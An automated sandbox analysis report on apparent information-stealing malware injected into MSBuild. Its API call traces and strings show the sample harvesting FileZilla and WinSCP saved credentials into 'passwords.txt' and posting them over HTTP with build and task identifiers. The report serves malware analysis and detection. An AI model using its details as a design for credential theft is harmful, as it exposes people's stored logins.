                                                                                                                                                                                                                      control_flow_graph 29 405482-405593 call 4104e7 call 410519 call 404ab6 call 411e5d lstrlenA call 411e5d call 4104e7 * 4 StrCmpCA 48 405595 29->48 49 40559b-4055a1 29->49 48->49 50 4055a3-4055b8 InternetOpenA 49->50 51 4055be-4056ce call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 4105c7 call 410609 call 41058d call 402920 * 3 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 49->51 50->51 52 405e64-405eec call 402920 * 4 call 410519 call 402920 * 3 50->52 51->52 118 4056d4-405712 HttpOpenRequestA 51->118 86 405eee-405f2e call 402920 * 6 call 41d016 52->86 119 405e58-405e5e InternetCloseHandle 118->119 120 405718-40571e 118->120 119->52 121 405720-405736 InternetSetOptionA 120->121 122 40573c-405d77 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 
402920 call 410609 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 427050 lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA HttpQueryInfoA 120->122 121->122 309 405db5-405dc5 call 411afd 122->309 310 405d79-405db0 call 4104e7 call 402920 * 3 122->310 316 405dcb-405dd0 309->316 317 405f2f 309->317 310->86 319 405e11-405e2e InternetReadFile 316->319 321 405e30-405e43 StrCmpCA 319->321 322 405dd2-405dda 319->322 324 405e45-405e46 ExitProcess 321->324 325 405e4c-405e52 InternetCloseHandle 321->325 322->321 326 405ddc-405e0c call 410609 call 41058d call 402920 322->326 325->119 326->319
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                                                                                                                        • Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
                                                                                                                                                                                                                        • Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
                                                                                                                                                                                                                        • Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                                                                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                                                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
                                                                                                                                                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,433cd71b7a2bdd3668a493b00ee95630,",build_id,00437814,------), ref: 00405C67
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00405C7A
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00405C99
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00405CA6
                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00405CB4
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00405CD6
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00405CE4
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00405D05
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
                                                                                                                                                                                                                      • HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
                                                                                                                                                                                                                      • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00405E46
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                                                                                      • String ID: ------$"$"$"$"$--$------$------$------$------$433cd71b7a2bdd3668a493b00ee95630$ERROR$ERROR$block$build_id$file_data

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                                                                        • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                                                                        • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 0040E77E
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040E7EA
                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040E829
                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040E862
                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040E89B
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040E901
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040E915
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D
                                                                                                                                                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                                                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406C54
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 00406C72
                                                                                                                                                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406E0A
                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00406E4E
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,",status,00437998,------,0043798C,",task_id,00437978,------,0043796C,",mode,00437958,------,0043794C), ref: 0040753C
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040754B
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407556
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0040755D
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040756A
                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00407578
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00407586
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 00407594
                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 004075A1
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 004075B6
                                                                                                                                                                                                                      • HttpSendRequestA.WININET(00000000,?,00000000), ref: 004075C4
                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00407621
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040762C
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00407638
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00407644
                                                                                                                                                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406E7C
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                                      • String ID: "$"$"$"$"$------$------$------$------$------$------$433cd71b7a2bdd3668a493b00ee95630$build_id$mode$status$task_id

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040E1B7
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040E1D7
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040E1E8
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040E1F9
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
                                                                                                                                                                                                                      • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E276
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E29D
                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
                                                                                                                                                                                                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
                                                                                                                                                                                                                      • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
                                                                                                                                                                                                                      • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                                                                                                                      • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt

Control-flow Graph (starting at 405f39; legend: Executed / Not Executed)
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                                                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,433cd71b7a2bdd3668a493b00ee95630,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040660C
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0040661E
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040662B
                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00406639
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00406647
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00406662
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
                                                                                                                                                                                                                      • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 004066ED
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 004066F9
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00406705
                                                                                                                                                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                                      • String ID: "$"$"$------$------$------$------$433cd71b7a2bdd3668a493b00ee95630$build_id$mode

Control-flow Graph (starting at 418643; legend: Executed / Not Executed)
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 00418684
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 0041869B
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 004186B2
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 004186C9
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 004186E0
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 004186F7
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 0041870E
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 00418725
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 0041873C
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 00418753
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 0041876A
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 00418781
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 00418798
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 004187AF
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 004187C6
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 004187DD
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 004187F4
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 0041880B
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 00418822
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 00418839
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041884A
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041885B
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041886C
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041888E
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75670000,004184C2), ref: 004188AA
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75750000,004184C2), ref: 004188C5
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 004188DC
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(76BE0000,004184C2), ref: 004188F7
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(759D0000,004184C2), ref: 00418912
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(773F0000,004184C2), ref: 0041892D
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 00418944
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2238633743-0

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      [Figure: control-flow graph 1280 covering 413b86-4145a5; legend: Executed / Not Executed]
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
                                                                                                                                                                                                                        • Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
                                                                                                                                                                                                                        • Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
                                                                                                                                                                                                                        • Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16
                                                                                                                                                                                                                        • Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
                                                                                                                                                                                                                        • Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
